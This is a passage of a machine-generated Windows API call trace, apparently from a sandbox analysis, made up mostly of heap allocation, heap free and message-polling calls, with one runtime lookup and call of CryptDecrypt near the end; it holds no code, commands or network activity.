hHeap=0x12c0000) returned 1 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.345] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.345] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0121.345] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.345] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0121.346] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0121.346] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.346] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.346] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.346] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.347] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.347] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.347] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.347] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.348] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0121.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0121.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.348] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.348] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.348] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0121.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.349] CharUpperBuffW (in: lpsz="True", cchLength=0x4 | out: lpsz="TRUE") returned 0x4 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c8a0 | out: hHeap=0x12c0000) returned 1 [0121.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1530b90 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.360] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDecrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDecrypt", cchWideChar=13, lpMultiByteStr=0x14bd8b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDecrypt", lpUsedDefaultChar=0x0) returned 13 [0121.361] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0121.362] GetProcAddress (hModule=0x77820000, lpProcName="CryptDecrypt") returned 0x77843860 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0121.362] CryptDecrypt (in: hKey=0x1458c18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x14f83e0, pdwDataLen=0x7df298 | out: pbData=0x14f83e0, pdwDataLen=0x7df298) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc40 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 